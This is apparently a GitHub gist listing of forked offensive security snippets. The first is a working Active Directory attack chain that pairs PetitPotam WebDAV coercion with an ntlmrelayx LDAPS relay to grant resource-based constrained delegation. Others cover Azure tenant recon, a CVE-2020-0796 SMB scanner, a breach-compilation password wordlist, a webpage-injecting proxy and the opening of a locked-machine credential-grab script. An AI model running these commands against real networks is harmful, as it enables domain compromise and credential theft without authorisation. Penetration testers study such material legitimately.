@jakuta-tech
jakuta-tech / webclient-rbcd.sh
Created November 30, 2023 12:34 — forked from zimnyaa/webclient-rbcd.sh
PetitPotam WebDAV coerced authentication + LDAPS relaying
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local
# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da
# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER
@jakuta-tech
jakuta-tech / az-enum.sh
Created February 17, 2023 02:47 — forked from iknowjason/az-enum.sh
Azure Enum & Recon Cheat Sheet
# Start with a DNS domain as seed, and do some recon to check if domain is M365 / Azure tenant hosted
# Insert your domain environment variable below
DOMAIN="microsoft.com"
# Check the getuserrealm.srf endpoint for domain information
# Check autodiscover.$DOMAIN DNS entry
host autodiscover.$DOMAIN
# Note: Checks the autodiscover forward lookup ~ you should see a CNAME record for autodiscover.$DOMAIN pointing to autodiscover.outlook.com
@jakuta-tech
jakuta-tech / check-smb-v3.11.sh
Created March 14, 2020 00:38 — forked from nikallass/check-smb-v3.11.sh
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
#!/bin/bash
if [ $# -eq 0 ]
then
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
exit 1
fi
echo "Checking if there's SMB v3.11 in $1 ..."
nmap -p445 --script smb-protocols -Pn -n "$1" | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3\.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep '3\.11' | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'
@jakuta-tech
jakuta-tech / gcp-gpu-vm-hashcat.md
Created December 6, 2019 23:04 — forked from koenrh/gcp-gpu-vm-hashcat.md
Running Hashcat on Google Cloud's new GPU-based VMs

Running Hashcat on Google Cloud's GPU-based VMs

In February 2017, Google announced the availability of GPU-based VMs. I spun up a few of these instances and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances and install the relevant drivers.

Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.

@jakuta-tech
jakuta-tech / tor-change-exitnode
Created January 25, 2018 02:38 — forked from kirelagin/tor-change-exitnode
Shell script to force Tor exit node change
#!/bin/sh
###
#
# Change Tor exit node
#
# Sometimes when using Tor you'd like to change the IP address that
# servers see when you connect (that is, change your Tor exit node).
# This happens automatically from time to time, but this shell script
# lets you force it.
#
@jakuta-tech
jakuta-tech / breachcompilation.txt
Created January 17, 2018 05:36
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@jakuta-tech
jakuta-tech / injector.py
Created January 8, 2017 06:17 — forked from revolunet/injector.py
Apache+Python proxy to inject arbitrary data into target webpages
#-*- encoding: UTF-8 -*-
import os
import sys
import re
PROXY = '%s.myproxy.com' % os.environ.get('host','')
lines = sys.stdin.readlines()
html = ''.join( lines )
@jakuta-tech
jakuta-tech / gist:61aafcc084e423bc58da274b29b37d42
Created November 6, 2016 21:14 — forked from cdown/gist:1163649
Bash urlencode and urldecode
urlencode() {
# urlencode <string>
old_lc_collate=$LC_COLLATE
LC_COLLATE=C
local length="${#1}"
for (( i = 0; i < length; i++ )); do
local c="${1:i:1}"
case $c in
[a-zA-Z0-9.~_-]) printf "$c" ;;
@jakuta-tech
jakuta-tech / mubix-lock.sh
Created October 8, 2016 04:51 — forked from binkybear/mubix-lock.sh
mubix-lock.sh
#!/bin/bash
#
# Attack created by Mubix. For more information see:
# https://room362.com/post/2016/snagging-creds-from-locked-machines
# Modified for Nethunter by Binkybear
#
# ================== #
# Check for root
# ================== #